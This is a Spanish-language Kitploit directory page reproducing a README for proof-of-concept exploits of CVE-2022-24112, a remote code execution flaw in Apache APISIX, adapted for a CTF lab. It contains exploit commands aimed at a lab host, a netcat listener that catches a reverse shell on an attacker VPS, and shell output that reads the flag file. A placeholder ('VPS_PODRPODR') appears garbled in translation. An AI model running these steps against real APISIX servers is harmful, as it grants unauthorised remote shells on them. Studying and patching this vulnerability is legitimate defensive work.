Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
Herramientas/GitHubGitHub/acczdy/cve-2022-24112_poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingSeguridad de APIs
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

Ver Repositorio
511hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC

Colección de POC

CVE-2022-24112

Para el entorno del campo de tiro 春秋云境:CVE-2022-24112, modifiqué dos POC, adaptando ligeramente los POC de los maestros M4xSec y twseptian para el campo de tiro 春秋云境:


春秋云境:CVE-2022-24112:

Apache APISIX es un servicio de puerta de enlace de API de microservicios nativo de la nube de la Apache Foundation. Este software se implementa basado en OpenResty y etcd, con enrutamiento dinámico y carga en caliente de plugins, adecuado para la gestión de API en sistemas de microservicios. Existe una vulnerabilidad de ejecución remota de código en Apache APISIX, que se origina porque el plugin batch-requests no restringe eficazmente las solicitudes por lotes de los usuarios. Un atacante puede eludir la restricción de IP de la API de administración a través de esta vulnerabilidad, lo que fácilmente conduce a una ejecución remota de código.


POC original:

1、M4xSec:https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

2、twseptian:https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

Los POC modificados son los dos que escribí arriba, para entornos Linux y Windows respectivamente:


CVE-2022-24112_Linux_by_twseptian.py

  1. Escucha en VPS: nc -lvvp 18888

  2. Entra al directorio de POC y ejecuta:

    Nota: Al añadir datos con -t, no es necesario escribir http:// o https://, solo el nombre de dominio y el puerto, como se muestra a continuación:

Descargar herramienta
root@kitploit:~
python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
  • Vuelve a consultar el VPS:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

  • CVE-2022-24112_Windows_by_M4xSec.py

    1. Escucha en VPS: nc -lvvp 18888

    2. Entra al directorio de POC y ejecuta:

      Nota: Al añadir datos con -t, no es necesario escribir http:// o https://, solo el nombre de dominio y el puerto, como se muestra a continuación:

      root@kitploit:~
      python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
      
    3. Vuelve a consultar el VPS:

      root@kitploit:~
      [root@root ~]# nc -lvvp 18888
      Ncat: Version 7.50 ( https://nmap.org/ncat )
      Ncat: Listening on :::18888
      Ncat: Listening on 0.0.0.0:18888
      Ncat: Connection from x.x.x.x.
      Ncat: Connection from x.x.x.x:x.
      id
      uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
      cat /flag
      flag{0834f79f-5f40-4389-bce7-c64e969734c4}